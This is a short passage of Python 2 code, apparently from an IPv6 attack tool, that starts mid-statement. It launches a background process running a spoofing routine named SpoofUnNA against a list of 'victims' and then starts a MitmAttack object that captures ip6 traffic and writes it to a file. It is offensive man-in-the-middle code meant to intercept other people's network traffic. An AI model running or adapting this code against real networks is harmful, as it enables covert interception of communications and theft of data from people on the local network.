source_ip, ip_list, myinterface, mac_source)
print "the victims are", victims
q = multiprocessing.Queue()
pr = multiprocessing.Process(target=SpoofUnNA,
args=(
victims,
myinterface,
mac_source,
))
pr.daemon = True
pr.start()
# signal.signal(signal.SIGINT, signal_handler)
myfilter = "ip6"
mitm = MitmAttack(myfilter, values.interface, source_ip, mac_source,
victims, file_to_write)
mitm.run()